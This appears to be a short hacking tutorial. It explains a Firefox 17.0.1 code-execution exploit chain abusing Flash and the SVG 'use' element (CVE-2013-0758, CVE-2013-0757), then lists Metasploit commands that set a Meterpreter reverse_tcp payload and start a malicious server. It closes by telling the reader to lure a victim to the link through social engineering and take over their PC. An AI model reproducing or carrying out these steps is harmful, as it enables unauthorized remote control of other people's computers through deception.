This exploit gains remote code execution on Firefox 17.0.1 and all previous versions provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the <body> (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.
MAC OS X PC
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use exploit/multi/browser/firefox_svg_plugin
msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)
msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)
msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)
msf exploit (firefox_svg_plugin)>exploit
Now an URL you should give to your victim //192.168.1.167:8080/
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“